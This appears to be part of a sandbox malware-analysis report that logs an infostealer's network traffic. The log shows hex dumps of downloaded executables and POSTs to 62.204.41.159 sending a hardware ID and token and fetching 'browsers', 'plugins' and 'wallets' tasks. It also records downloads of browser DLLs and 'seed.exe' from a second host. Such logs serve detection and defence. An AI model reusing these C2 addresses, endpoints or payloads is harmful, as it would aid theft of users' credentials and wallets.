00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:25 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 06:19:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 05 Sep 2024 14:37:52 GMTETag: "4400-621603c451000"Accept-Ranges: bytesContent-Length: 17408Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 30 2c f3 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 3a 00 00 00 08 00 00 00 00 00 00 4a 59 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f7 58 00 00 4f 00 00 00 00 60 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 30 58 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 39 00 00 00 20 00 00 00 3a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 60 00 00 00 06 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2b 59 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 2e 00 00 58 29 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 03 04 58 04 5a 2a 00 1b 30 02 00 3e 00 00 00 01 00 00 11 73 14 00 00 0a 0a 03 6f 15 00 00 0a 0b 2b 14 12 01 28 16 00 00 0a 0c 08 18 5d 2d 07 06 08 6f 17 00 00 0a 12 01 28 18 00 00 0a 2d e3 de 0e 12 01 fe 16 02 00 00 1b 6f 19 00 00 0a dc 06 2a 00 00 01 10 00 00 02 00 0d 00 21 2e 00 0e 00 00 00 00 c2 03 16 31 11 03 18 5d 2d 06 72 01 00 00 70 2a 72 37 00 00 70 2a 03 16 2f 11 03 18 5d 2d 06 72 6b 00 00 70 2a 72 a1 00 00 70 2a 72 d5 00 00 70 2a 26 03 1f 0a 31 02 17 2a 16 2a 00 13 30 03 00 39 00 00 00 02 00 00 11 23 00 00 00 00 00 00 00 00 0a 16 0b 2b 0f 06 03 07 6c 28 1a 00 00 0a 58 0a 07 17 58 0b 07 1b 32 ed 06 23 00 00 00 00 00 00 00 00 34 0a 23 00 00 00 00 00 00 00 00 2a 06 2a 00 00 00 13 30 02 00 2f 00 00 00 03 00 00 11 12 00 28 1b 00 00 0a 7d 17 00 00 04 12 00 15 7d 16 00 00 04 12 00 7c 17 00 00 04 12 00 28 01 00 00 2b 12 00 7c 17 00 00 04 28 1d 00 00 0a 2a 00 13 30 02 00 37 00 00 00 04 00 00 11 12 00 28 1b 00 00 0a 7d 13 00 00 04 12 00 02 7d 14 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.159Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 62.204.41.159Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 46 39 42 44 36 45 42 38 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 34 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="hwid"96F9BD6EB8693196934881------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="build"default4_doz------BKFBAKFCBFHIJJJJDBFC--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 62.204.41.159Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="message"browsers------JJECAAEHCFIEBGCBGHIE--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCHost: 62.204.41.159Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="message"plugins------DGIJECGDGCBKECAKFBGC--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 62.204.41.159Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"fplugins------JDAEHJJECAEGCAAAAEGI--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 62.204.41.159Content-Length: 6339Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 62.204.41.159Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGIHost: 62.204.41.159Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: 62.204.41.159Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="file"------KFHJJDHJEGHJKECBGCFH--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGIHost: 62.204.41.159Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 2d 2d 0d 0a Data Ascii: ------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="file"------CFHCBKKFIJJJECAAFCGI--
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/freebl3.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/mozglue.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/msvcp140.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/nss3.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/softokn3.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/vcruntime140.dll HTTP/1.1Host: 62.204.41.159Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 62.204.41.159Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 62.204.41.159Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="message"wallets------JDBGDHIIDAEBFHJJDBFI--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 62.204.41.159Content-Length: 269Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 33 36 30 30 65 61 37 34 65 64 35 66 38 32 61 31 37 32 62 36 63 36 36 66 38 30 63 33 36 32 61 63 34 35 31 63 36 31 61 63 39 31 35 35 30 61 63 65 31 34 63 62 39 63 33 66 37 62 63 65 36 33 63 35 64 63 63 34 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 74 6b 6a 77 65 66 77 65 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="token"513600ea74ed5f82a172b6c66f80c362ac451c61ac91550ace14cb9c3f7bce63c5dcc456------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="message"tkjwefwee------AAKKKEBFCGDBGDGCFHCB--
Source: global traffic HTTP traffic detected: GET /seed.exe HTTP/1.1Host: 176.113.115.187Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 62.204.41.159Content-Length: 130355Connection: Keep-AliveCache-Control: no-cache
